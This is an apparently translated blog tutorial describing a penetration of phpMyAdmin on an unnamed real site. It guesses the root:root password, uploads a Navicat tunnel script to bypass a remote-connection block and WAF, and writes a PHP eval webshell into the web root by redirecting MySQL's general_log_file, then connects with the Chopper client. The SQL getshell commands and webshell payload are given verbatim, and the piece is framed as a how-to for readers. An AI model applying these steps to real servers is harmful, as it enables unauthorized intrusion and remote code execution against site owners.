Share a penetration test by Phpmyadmin

The following is a penetration test of Phpmyadmin from the tutorial column of phpmyadmin. I hope it will be helpful to friends in need!

First scan a certain site through directory scanning and find that phpmyadmin exists. Try the weak password root: root is lucky to get in

##Try to use When Navicate connects to the database, it returns that remote connection to the database is prohibited:

However, the remote command execution found that the local 3306 port was open, so it tried to connect through a proxy:

Upload the ntunnel_mysql.php file (database proxy script) in the Navicat installation directory to any web site directory on the target server (uploaded later after getshell)

Upload to the D:/phpStudy/WWW directory to access http://XXX/ntunnel_mysql.php Test successful

Test connection:

(At this time, open Navicat locally to configure the http connection. The channel address here is the url you visited above. To put it bluntly, On the agent side, check the box to use base64 encoding to prevent waf from causing trouble. Then write localhost as the host name, and write the account of the lnmp01 local database user as the account password, because you need to connect to the local mysql of lnmp01)

Phpmyadmin Get Shell:

Use log files

mysql version 5.0 or above will create log files and modify the global log file Variables can also be used with getshell. But you must also have read and write permissions on the generated logs.

set global general_log = "ON";   #当开启general时，所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么，如果修改general_log_file的值，那么所执行的sql语句就会对应生成进而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #对应就会生成test1234.php文件
select &#39;<?php eval($_POST[2019]);?>&#39;;          #将一句话木马写入test1234.php文件

Chopper connection:

The above is the detailed content of Share a penetration test by Phpmyadmin. For more information, please follow other related articles on the PHP Chinese website!